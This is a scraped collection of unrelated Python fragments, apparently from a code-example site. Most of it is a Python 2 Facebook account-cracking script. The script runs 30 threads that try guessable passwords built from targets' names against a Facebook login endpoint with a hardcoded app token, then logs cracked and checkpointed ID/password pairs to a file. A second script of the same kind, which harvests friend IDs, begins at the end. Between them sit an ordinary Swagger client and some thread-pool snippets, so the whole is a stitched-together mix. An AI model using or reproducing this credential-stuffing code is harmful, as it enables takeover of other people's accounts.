                                    'name']
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass3 + '\n'
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                        'name']
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass3 + '\n'
                                    cek = open("out/super_cp.txt", "a")
                                    cek.write("ID:" + user + " Pw:" + pass3 +
                                              "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = b['first_name'] + 'kausar'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        x = requests.get(
                                            "https://graph.facebook.com/" +
                                            user + "?access_token=" +
                                            q['access_token'])
                                        z = json.loads(x.text)
                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                            'name']
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass4 + '\n'
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                'name']
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass4 + '\n'
                                            cek = open("out/super_cp.txt", "a")
                                            cek.write("ID:" + user + " Pw:" +
                                                      pass4 + "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            pass5 = '786786'
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                x = requests.get(
                                                    "https://graph.facebook.com/"
                                                    + user + "?access_token=" +
                                                    q['access_token'])
                                                z = json.loads(x.text)
                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                    'name']
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass5 + '\n'
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                        'name']
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass5 + '\n'
                                                    cek = open(
                                                        "out/super_cp.txt",
                                                        "a")
                                                    cek.write("ID:" + user +
                                                              " Pw:" + pass5 +
                                                              "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = 'Pakistan'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        x = requests.get(
                                                            "https://graph.facebook.com/"
                                                            + user +
                                                            "?access_token=" +
                                                            q['access_token'])
                                                        z = json.loads(x.text)
                                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                            'name']
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass6 + '\n'
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                'name']
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass6 + '\n'
                                                            cek = open(
                                                                "out/super_cp.txt",
                                                                "a")
                                                            cek.write("ID:" +
                                                                      user +
                                                                      " Pw:" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
                                                        else:
                                                            pass7 = b[
                                                                'first_name'] + '12345'
                                                            data = urllib.urlopen(
                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                + (user) +
                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                            )
                                                            q = json.load(data)
                                                            if 'access_token' in q:
                                                                x = requests.get(
                                                                    "https://graph.facebook.com/"
                                                                    + user +
                                                                    "?access_token="
                                                                    +
                                                                    q['access_token']
                                                                )
                                                                z = json.loads(
                                                                    x.text)
                                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                    'name']
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass7 + '\n'
                                                                oks.append(
                                                                    user +
                                                                    pass7)
                                                            else:
                                                                if 'www.facebook.com' in q[
                                                                        "error_msg"]:
                                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                        'name']
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass7 + '\n'
                                                                    cek = open(
                                                                        "out/super_cp.txt",
                                                                        "a")
                                                                    cek.write(
                                                                        "ID:" +
                                                                        user +
                                                                        " Pw:"
                                                                        +
                                                                        pass7 +
                                                                        "\n")
                                                                    cek.close()
                                                                    cekpoint.append(
                                                                        user +
                                                                        pass7)
                                                                else:
                                                                    pass8 = b[
                                                                        'last_name'] + '786'
                                                                    data = urllib.urlopen(
                                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                        + (user
                                                                           ) +
                                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                                    )
                                                                    q = json.load(
                                                                        data)
                                                                    if 'access_token' in q:
                                                                        x = requests.get(
                                                                            "https://graph.facebook.com/"
                                                                            +
                                                                            user
                                                                            +
                                                                            "?access_token="
                                                                            +
                                                                            q['access_token']
                                                                        )
                                                                        z = json.loads(
                                                                            x.
                                                                            text
                                                                        )
                                                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                            'name']
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass8 + '\n'
                                                                        oks.append(
                                                                            user
                                                                            +
                                                                            pass8
                                                                        )
                                                                    else:
                                                                        if 'www.facebook.com' in q[
                                                                                "error_msg"]:
                                                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                                'name']
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass8 + '\n'
                                                                            cek = open(
                                                                                "out/super_cp.txt",
                                                                                "a"
                                                                            )
                                                                            cek.write(
                                                                                "ID:"
                                                                                +
                                                                                user
                                                                                +
                                                                                " Pw:"
                                                                                +
                                                                                pass8
                                                                                +
                                                                                "\n"
                                                                            )
                                                                            cek.close(
                                                                            )
                                                                            cekpoint.append(
                                                                                user
                                                                                +
                                                                                pass8
                                                                            )
                                                                        else:
                                                                            pass9 = b[
                                                                                'first_name'] + '786'
                                                                            data = urllib.urlopen(
                                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                                +
                                                                                (user
                                                                                 )
                                                                                +
                                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                                            )
                                                                            q = json.load(
                                                                                data
                                                                            )
                                                                            if 'access_token' in q:
                                                                                x = requests.get(
                                                                                    "https://graph.facebook.com/"
                                                                                    +
                                                                                    user
                                                                                    +
                                                                                    "?access_token="
                                                                                    +
                                                                                    q['access_token']
                                                                                )
                                                                                z = json.loads(
                                                                                    x
                                                                                    .
                                                                                    text
                                                                                )
                                                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                                    'name']
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass9 + '\n'
                                                                                oks.append(
                                                                                    user
                                                                                    +
                                                                                    pass9
                                                                                )
                                                                            else:
                                                                                if 'www.facebook.com' in q[
                                                                                        "error_msg"]:
                                                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                                        'name']
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass9 + '\n'
                                                                                    cek = open(
                                                                                        "out/super_cp.txt",
                                                                                        "a"
                                                                                    )
                                                                                    cek.write(
                                                                                        "ID:"
                                                                                        +
                                                                                        user
                                                                                        +
                                                                                        " Pw:"
                                                                                        +
                                                                                        pass9
                                                                                        +
                                                                                        "\n"
                                                                                    )
                                                                                    cek.close(
                                                                                    )
                                                                                    cekpoint.append(
                                                                                        user
                                                                                        +
                                                                                        pass9
                                                                                    )

        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print "\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;91mMdkausar😉\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
    print "  \033[1;91m«---•◈•---Developed By Md Kausar-•◈•---»"  #Dev:Kausar
    print '\033[1;93m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 Md Kausar)↩\033[1;97m....'
    print "\033[1;91mTotal OK/\x1b[1;95mCP \033[1;93m: \033[1;91m" + str(
        len(oks)) + "\033[1;93m/\033[1;96m" + str(len(cekpoint))
    print """
 
         Checkpoint ID Open After 7 Days
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;91m ....MD KAUSAR....... \033[1;95m :
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.' 
                Facebook
              \033[1;91m kAUSAR"""

    raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
    menu()
class CloudApiClient(object):
    """Generic API client for Swagger client library builds.

    Swagger generic API client. This client handles the client-
    server communication, and is invariant across implementations. Specifics of
    the methods and models for each application are generated from the Swagger
    templates.

    NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen
    Do not edit the class manually.

    :param configuration: .Configuration object for this client
    :param header_name: a header to pass when making calls to the API.
    :param header_value: a header value to pass when making calls to
        the API.
    :param cookie: a cookie to include in the header when making calls
        to the API
    """

    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    NATIVE_TYPES_MAPPING = {
        'int': int,
        'long': int if six.PY3 else long,  # noqa: F821
        'float': float,
        'str': str,
        'bool': bool,
        'date': datetime.date,
        'datetime': datetime.datetime,
        'object': object,
    }

    def __init__(self,
                 configuration=None,
                 header_name=None,
                 header_value=None,
                 cookie=None):
        if configuration is None:
            configuration = Configuration()
        self.configuration = configuration

        self.pool = ThreadPool()
        self.rest_client = rest.RESTClientObject(configuration)
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Set default User-Agent.
        self.user_agent = 'Swagger-Codegen/1.0.0/python'

    def __del__(self):
        self.pool.close()
        self.pool.join()

    @property
    def user_agent(self):
        """User agent for this API client"""
        return self.default_headers['User-Agent']

    @user_agent.setter
    def user_agent(self, value):
        self.default_headers['User-Agent'] = value

    def set_default_header(self, header_name, header_value):
        self.default_headers[header_name] = header_value

    def __call_api(self,
                   resource_path,
                   method,
                   path_params=None,
                   query_params=None,
                   header_params=None,
                   body=None,
                   post_params=None,
                   files=None,
                   response_type=None,
                   auth_settings=None,
                   _return_http_data_only=None,
                   collection_formats=None,
                   _preload_content=True,
                   _request_timeout=None):

        config = self.configuration

        # header parameters
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(
                self.parameters_to_tuples(header_params, collection_formats))

        # path parameters
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params,
                                                    collection_formats)
            for k, v in path_params:
                # specified safe chars, encode everything
                resource_path = resource_path.replace(
                    '{%s}' % k,
                    quote(str(v), safe=config.safe_chars_for_path_param))

        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params,
                                                     collection_formats)

        # post parameters
        if post_params or files:
            post_params = self.prepare_post_parameters(post_params, files)
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params,
                                                    collection_formats)

        # auth setting
        self.update_params_for_auth(header_params, query_params, auth_settings)

        # body
        if body:
            body = self.sanitize_for_serialization(body)

        # request url
        url = self.configuration.host + resource_path

        # perform request and return response
        response_data = self.request(method,
                                     url,
                                     query_params=query_params,
                                     headers=header_params,
                                     post_params=post_params,
                                     body=body,
                                     _preload_content=_preload_content,
                                     _request_timeout=_request_timeout)

        self.last_response = response_data

        return_data = response_data
        if _preload_content:
            # deserialize response data
            if response_type:
                return_data = self.deserialize(response_data, response_type)
            else:
                return_data = None

        if _return_http_data_only:
            return (return_data)
        else:
            return (return_data, response_data.status,
                    response_data.getheaders())

    def sanitize_for_serialization(self, obj):
        """Builds a JSON POST object.

        If obj is None, return None.
        If obj is str, int, long, float, bool, return directly.
        If obj is datetime.datetime, datetime.date
            convert to string in iso8601 format.
        If obj is list, sanitize each element in the list.
        If obj is dict, return the dict.
        If obj is swagger model, return the properties dict.

        :param obj: The data to serialize.
        :return: The serialized form of data.
        """
        if obj is None:
            return None
        elif isinstance(obj, self.PRIMITIVE_TYPES):
            return obj
        elif isinstance(obj, list):
            return [
                self.sanitize_for_serialization(sub_obj) for sub_obj in obj
            ]
        elif isinstance(obj, tuple):
            return tuple(
                self.sanitize_for_serialization(sub_obj) for sub_obj in obj)
        elif isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()

        if isinstance(obj, dict):
            obj_dict = obj
        else:
            # Convert model obj to dict except
            # attributes `swagger_types`, `attribute_map`
            # and attributes which value is not None.
            # Convert attribute name to json key in
            # model definition for request.
            obj_dict = {
                obj.attribute_map[attr]: getattr(obj, attr)
                for attr, _ in six.iteritems(obj.swagger_types)
                if getattr(obj, attr) is not None
            }

        return {
            key: self.sanitize_for_serialization(val)
            for key, val in six.iteritems(obj_dict)
        }

    def deserialize(self, response, response_type):
        """Deserializes response into an object.

        :param response: RESTResponse object to be deserialized.
        :param response_type: class literal for
            deserialized object, or string of class name.

        :return: deserialized object.
        """
        # handle file downloading
        # save response body into a tmp file and return the instance
        if response_type == "file":
            return self.__deserialize_file(response)

        # fetch data from response object
        try:
            data = json.loads(response.data)
        except ValueError:
            data = response.data

        return self.__deserialize(data, response_type)

    def __deserialize(self, data, klass):
        """Deserializes dict, list, str into an object.

        :param data: dict, list or str.
        :param klass: class literal, or string of class name.

        :return: object.
        """
        if data is None:
            return None

        if type(klass) == str:
            if klass.startswith('list['):
                sub_kls = re.match('list\[(.*)\]', klass).group(1)
                return [
                    self.__deserialize(sub_data, sub_kls) for sub_data in data
                ]

            if klass.startswith('dict('):
                sub_kls = re.match('dict\(([^,]*), (.*)\)', klass).group(2)
                return {
                    k: self.__deserialize(v, sub_kls)
                    for k, v in six.iteritems(data)
                }

            # convert str to class
            if klass in self.NATIVE_TYPES_MAPPING:
                klass = self.NATIVE_TYPES_MAPPING[klass]
            else:
                klass = getattr(cloud_client.models, klass)

        if klass in self.PRIMITIVE_TYPES:
            return self.__deserialize_primitive(data, klass)
        elif klass == object:
            return self.__deserialize_object(data)
        elif klass == datetime.date:
            return self.__deserialize_date(data)
        elif klass == datetime.datetime:
            return self.__deserialize_datatime(data)
        else:
            return self.__deserialize_model(data, klass)

    def call_api(self,
                 resource_path,
                 method,
                 path_params=None,
                 query_params=None,
                 header_params=None,
                 body=None,
                 post_params=None,
                 files=None,
                 response_type=None,
                 auth_settings=None,
                 async_=None,
                 _return_http_data_only=None,
                 collection_formats=None,
                 _preload_content=True,
                 _request_timeout=None):
        """Makes the HTTP request (synchronous) and returns deserialized data.

        To make an async request, set the async parameter.

        :param resource_path: Path to method endpoint.
        :param method: Method to call.
        :param path_params: Path parameters in the url.
        :param query_params: Query parameters in the url.
        :param header_params: Header parameters to be
            placed in the request header.
        :param body: Request body.
        :param post_params dict: Request post form parameters,
            for `application/x-www-form-urlencoded`, `multipart/form-data`.
        :param auth_settings list: Auth Settings names for the request.
        :param response: Response data type.
        :param files dict: key -> filename, value -> filepath,
            for `multipart/form-data`.
        :param async bool: execute request asynchronously
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param collection_formats: dict of collection formats for path, query,
            header, and post parameters.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return:
            If async parameter is True,
            the request will be called asynchronously.
            The method will return the request thread.
            If parameter async is False or missing,
            then the method will return the response directly.
        """
        if not async_:
            return self.__call_api(resource_path, method, path_params,
                                   query_params, header_params, body,
                                   post_params, files, response_type,
                                   auth_settings, _return_http_data_only,
                                   collection_formats, _preload_content,
                                   _request_timeout)
        else:
            thread = self.pool.apply_async(
                self.__call_api,
                (resource_path, method, path_params, query_params,
                 header_params, body, post_params, files, response_type,
                 auth_settings, _return_http_data_only, collection_formats,
                 _preload_content, _request_timeout))
        return thread

    def request(self,
                method,
                url,
                query_params=None,
                headers=None,
                post_params=None,
                body=None,
                _preload_content=True,
                _request_timeout=None):
        """Makes the HTTP request using RESTClient."""
        if method == "GET":
            return self.rest_client.GET(url,
                                        query_params=query_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        headers=headers)
        elif method == "HEAD":
            return self.rest_client.HEAD(url,
                                         query_params=query_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         headers=headers)
        elif method == "OPTIONS":
            return self.rest_client.OPTIONS(url,
                                            query_params=query_params,
                                            headers=headers,
                                            post_params=post_params,
                                            _preload_content=_preload_content,
                                            _request_timeout=_request_timeout,
                                            body=body)
        elif method == "POST":
            return self.rest_client.POST(url,
                                         query_params=query_params,
                                         headers=headers,
                                         post_params=post_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         body=body)
        elif method == "PUT":
            return self.rest_client.PUT(url,
                                        query_params=query_params,
                                        headers=headers,
                                        post_params=post_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        body=body)
        elif method == "PATCH":
            return self.rest_client.PATCH(url,
                                          query_params=query_params,
                                          headers=headers,
                                          post_params=post_params,
                                          _preload_content=_preload_content,
                                          _request_timeout=_request_timeout,
                                          body=body)
        elif method == "DELETE":
            return self.rest_client.DELETE(url,
                                           query_params=query_params,
                                           headers=headers,
                                           _preload_content=_preload_content,
                                           _request_timeout=_request_timeout,
                                           body=body)
        else:
            raise ValueError("http method must be `GET`, `HEAD`, `OPTIONS`,"
                             " `POST`, `PATCH`, `PUT` or `DELETE`.")

    def parameters_to_tuples(self, params, collection_formats):
        """Get parameters as list of tuples, formatting collections.

        :param params: Parameters as dict or list of two-tuples
        :param dict collection_formats: Parameter collection formats
        :return: Parameters as list of tuples, collections formatted
        """
        new_params = []
        if collection_formats is None:
            collection_formats = {}
        for k, v in six.iteritems(params) if isinstance(
                params, dict) else params:  # noqa: E501
            if k in collection_formats:
                collection_format = collection_formats[k]
                if collection_format == 'multi':
                    new_params.extend((k, value) for value in v)
                else:
                    if collection_format == 'ssv':
                        delimiter = ' '
                    elif collection_format == 'tsv':
                        delimiter = '\t'
                    elif collection_format == 'pipes':
                        delimiter = '|'
                    else:  # csv is the default
                        delimiter = ','
                    new_params.append(
                        (k, delimiter.join(str(value) for value in v)))
            else:
                new_params.append((k, v))
        return new_params

    def prepare_post_parameters(self, post_params=None, files=None):
        """Builds form parameters.

        :param post_params: Normal form parameters.
        :param files: File parameters.
        :return: Form parameters with files.
        """
        params = []

        if post_params:
            params = post_params

        if files:
            for k, v in six.iteritems(files):
                if not v:
                    continue
                file_names = v if type(v) is list else [v]
                for n in file_names:
                    with open(n, 'rb') as f:
                        filename = os.path.basename(f.name)
                        filedata = f.read()
                        mimetype = (mimetypes.guess_type(filename)[0]
                                    or 'application/octet-stream')
                        params.append(
                            tuple([k, tuple([filename, filedata, mimetype])]))

        return params

    def select_header_accept(self, accepts):
        """Returns `Accept` based on an array of accepts provided.

        :param accepts: List of headers.
        :return: Accept (e.g. application/json).
        """
        if not accepts:
            return

        accepts = [x.lower() for x in accepts]

        if 'application/json' in accepts:
            return 'application/json'
        else:
            return ', '.join(accepts)

    def select_header_content_type(self, content_types):
        """Returns `Content-Type` based on an array of content_types provided.

        :param content_types: List of content-types.
        :return: Content-Type (e.g. application/json).
        """
        if not content_types:
            return 'application/json'

        content_types = [x.lower() for x in content_types]

        if 'application/json' in content_types or '*/*' in content_types:
            return 'application/json'
        else:
            return content_types[0]

    def update_params_for_auth(self, headers, querys, auth_settings):
        """Updates header and query params based on authentication setting.

        :param headers: Header parameters dict to be updated.
        :param querys: Query parameters tuple list to be updated.
        :param auth_settings: Authentication setting identifiers list.
        """
        if not auth_settings:
            return

        for auth in auth_settings:
            auth_setting = self.configuration.auth_settings().get(auth)
            if auth_setting:
                if not auth_setting['value']:
                    continue
                elif auth_setting['in'] == 'header':
                    headers[auth_setting['key']] = auth_setting['value']
                elif auth_setting['in'] == 'query':
                    querys.append((auth_setting['key'], auth_setting['value']))
                else:
                    raise ValueError(
                        'Authentication token must be in `query` or `header`')

    def __deserialize_file(self, response):
        """Deserializes body to file

        Saves response body into a file in a temporary folder,
        using the filename from the `Content-Disposition` header if provided.

        :param response:  RESTResponse.
        :return: file path.
        """
        fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
        os.close(fd)
        os.remove(path)

        content_disposition = response.getheader("Content-Disposition")
        if content_disposition:
            filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                                 content_disposition).group(1)
            path = os.path.join(os.path.dirname(path), filename)

        with open(path, "wb") as f:
            f.write(response.data)

        return path

    def __deserialize_primitive(self, data, klass):
        """Deserializes string to primitive type.

        :param data: str.
        :param klass: class literal.

        :return: int, long, float, str, bool.
        """
        try:
            return klass(data)
        except UnicodeEncodeError:
            return six.u(data)
        except TypeError:
            return data

    def __deserialize_object(self, value):
        """Return a original value.

        :return: object.
        """
        return value

    def __deserialize_date(self, string):
        """Deserializes string to date.

        :param string: str.
        :return: date.
        """
        try:
            from dateutil.parser import parse
            return parse(string).date()
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason="Failed to parse `{0}` as date object".format(string))

    def __deserialize_datatime(self, string):
        """Deserializes string to datetime.

        The string should be in iso8601 datetime format.

        :param string: str.
        :return: datetime.
        """
        try:
            from dateutil.parser import parse
            return parse(string)
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason=(
                    "Failed to parse `{0}` as datetime object".format(string)))

    def __deserialize_model(self, data, klass):
        """Deserializes list or dict to model.

        :param data: dict, list.
        :param klass: class literal.
        :return: model object.
        """

        if not klass.swagger_types and not hasattr(klass,
                                                   'get_real_child_model'):
            return data

        kwargs = {}
        if klass.swagger_types is not None:
            for attr, attr_type in six.iteritems(klass.swagger_types):
                if (data is not None and klass.attribute_map[attr] in data
                        and isinstance(data, (list, dict))):
                    value = data[klass.attribute_map[attr]]
                    kwargs[attr] = self.__deserialize(value, attr_type)

        instance = klass(**kwargs)

        if hasattr(instance, 'get_real_child_model'):
            klass_name = instance.get_real_child_model(data)
            if klass_name:
                instance = self.__deserialize(data, klass_name)
        return instance
Exemple #50
0
 def SetPorts(cls, ports: int):
     __MAXPORT__ == __MINPORT__ + ports - 1
     cls.__pool = ThreadPool(__MAXPORT__ - __MINPORT__ + 1)
Exemple #51
0
def run():
    dev = ThreadPool(30)
    dev.map(pro_dev, users1)
                        default=3,
                        type=int,
                        help='number of folds for cross-validation')
    args = parser.parse_args()

    # get the command line arguments
    data_path = os.path.expanduser(args.data)
    num_folds = args.folds

    # load the data
    data = load_data(data_path)

    # create the folds
    folds = make_folds(data, num_folds)

    # create worker threads
    pool = ThreadPool(processes=num_folds)

    # fire up the workers
    classification_reports = pool.map(validate_with_fold_helper,
                                      zip(folds, repeat(data, num_folds)))

    pool.close()
    pool.join()

    for fold_number, report in enumerate(classification_reports, 1):
        print('******************fold_{}_results********************\n'.format(
            fold_number))
        print(report)
        print('****************************************************\n')
Exemple #53
0
def pilih_super():
    peak = raw_input("\n\033[1;97m >>> \033[1;97m")
    if peak == "":
        print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        idt = raw_input(
            "\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
